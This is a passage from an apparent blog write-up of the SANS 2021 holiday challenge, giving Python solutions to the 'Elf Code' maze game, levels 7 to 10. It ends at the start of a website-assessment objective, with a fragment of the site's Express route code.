&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveLeft&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;11&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveDown&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;11&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 7 solution. The elf winds through the maze, picks up the lollipop that is on the way, and then walks up to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_7_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-8"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id64"&gt;Level 8&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 8. Now the elf must wind through another maze, first horizontally, then vertically. There is a Munchkin marching before the castle door. After the maze, there's a lever that we can activate to spring the trap door open, making the Munchkin fall into it." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_8.png" /&gt;
&lt;p&gt;Now, our little elf must wind through this maze, and activate the lever to
make the Munchkin fall. Alternatively, we can answer the Munchkin's riddle so
that they let us pass.&lt;/p&gt;
&lt;p&gt;First, let's try the lever option. The lever gives us a list, which we must
prepend with the string &lt;code&gt;munchkins rule&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
&lt;span class="n"&gt;all_lollipops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;lever&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;lollipop&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_lollipops&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lollipop&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lever&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;lever&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pull&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;munchkins rule&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;lever&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveDown&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveLeft&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 8 solution. The elf winds through the maze, activates the lever, which makes the Munchkin fall into the trap door. The elf then goes up to the castle door." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_8_w00t.gif" /&gt;
&lt;p&gt;Now, let's try answering the Munchkin's riddle. The Munchkin will give us a
dictionary object. We must give them the key that holds the value
&lt;code&gt;lolippop&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
&lt;span class="n"&gt;all_lollipops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;lever&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;lollipop&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_lollipops&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lollipop&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="n"&gt;d&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ask&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;d&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;lollipop&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;answer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 8 solution. The elf winds through the maze, then goes up to the Munchkin and answers their riddle. The Munchkin turns from red to green, indicating they're friendly, and let the elf go up to the the castle door." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_8_w00t_2.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-9"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id65"&gt;Level 9&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Let's go for the bonus levels!&lt;/p&gt;
&lt;img alt="Elf Code Level 9. The elf is at the center of a yeeters spiral. In the spiral, there are levers that can be activated to close traps over the pits that are in the way. North of this spiral, there's a Munchkin garding the castle door." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_9.png" /&gt;
&lt;p&gt;Okay, we must go round our way through this spiral, making sure we don't fall
into any pit by activating the levers, and answer the Munchkin's riddle.
According to the level doc, we now that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Each lever wants to be sent its id number, &lt;em&gt;e.g.&lt;/em&gt; lever #0 wants to be sent
0, lever #1 wants to be sent 1, and so on.&lt;/li&gt;
&lt;li&gt;The Munchkins asks for a function that takes a list as argument, and must
return a new list, where each integer in the original list is incremented by
1.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And just for fun, the &lt;code&gt;elf.moveTo&lt;/code&gt; function has been disabled just for
this level.&lt;/p&gt;
&lt;p&gt;The skeleton code given by the level helps us create a loop that will allow our
little elf to go through the Yeeter Swirl safely.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;sum_of_ints&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;list_of_lists&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;total&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;l&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;list_of_lists&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;l&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;total&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;total&lt;/span&gt;

&lt;span class="n"&gt;all_levers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="c1"&gt;# Create Movement pattern:&lt;/span&gt;
&lt;span class="n"&gt;moves&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveDown&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveLeft&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveRight&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

&lt;span class="c1"&gt;# We iterate over each move in moves getting an index (i) number that increments by one each time&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;move&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;moves&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;move&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_levers&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;all_levers&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveLeft&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;answer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sum_of_ints&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 9 solution. The elf goes round and round in the swirl, activating every lever, going over every covered pit, and finally answer the Munchkin's riddle before getting to the castle door." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_9_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-10"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id66"&gt;Level 10&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;This is the last bonus level.&lt;/p&gt;
&lt;img alt="Elf Code Level 10. Our elf is in a maze with patrolling Munchkins." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_10.png" /&gt;
&lt;p&gt;We must get through this maze by dodging the patrolling Munchkins. The skeleton
code hints that we should wait before the Munchkins are the farthest away from
our elf to move. It also tells us that the maximum distance is 6 squares along
the X axis. Finally, it tells us that we can use &lt;code&gt;time.sleep(0.05)&lt;/code&gt; to
wait before moving, so that the browser doesn't go wild in our &lt;code&gt;while&lt;/code&gt;
loop.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;time&lt;/span&gt;
&lt;span class="n"&gt;muns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;lols&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;()[::&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;mun&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;muns&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nb"&gt;abs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;mun&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;0.05&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lols&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 10 solution. The elf patiently waits before each Munchkin is far enough to move from lollipop to lollipop before going up to the castle door. At the end, a victory message pops up, saying: &amp;quot;You've won the game! (Elves rule, Munchkins drool)&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_10_w00t.gif" /&gt;
&lt;p&gt;Elves rule, Munchkins drool 🤘&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="frost-tower-website-checkup"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id67"&gt;Frost Tower Website Checkup&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We move to Jack's studio, where we find Ingreta Tude.&lt;/p&gt;
&lt;img alt="Ingreta Tude. She's a troll with long brown hair, wearing a brownish parka, and blue pants." class="align-center" src="/images/sans-christmas-challenge-2021/ingretatude.png" /&gt;
&lt;p&gt;&lt;em&gt;Ingreta Tude says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey there! I’m Ingreta Tude. I really don’t like the direction Jack Frost
is leading us.&lt;/p&gt;
&lt;p&gt;He seems obsessed with beating Santa and taking over the holiday season. It
just doesn’t seem right.&lt;/p&gt;
&lt;p&gt;Why can’t we work together with Santa and the elves instead of trying to
beat them?&lt;/p&gt;
&lt;p&gt;But, I do have an Objective for you. We’re getting ready to launch a new
website for Frost Tower, and the big guy has charged me with making sure
it’s secure.&lt;/p&gt;
&lt;p&gt;My sister, Ruby Cyster, created this site, and I don’t trust the results.&lt;/p&gt;
&lt;p&gt;Can you please take a look at it to find flaws?&lt;/p&gt;
&lt;p&gt;Here is the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/jackfrosttower-network.zip"&gt;source code&lt;/a&gt;
if you need it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;She asks us to assess the security of the &lt;a class="reference external" href="https://staging.jackfrosttower.com/"&gt;Frost Tower website&lt;/a&gt;,
and she even gave us the source code.&lt;/p&gt;
&lt;p&gt;The main page seems to just be a countdown to Christmas Day. However, by
looking at the source code, we see that there is an endpoint at
&lt;a class="reference external" href="https://staging.jackfrosttower.com/contact"&gt;https://staging.jackfrosttower.com/contact&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/contact&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
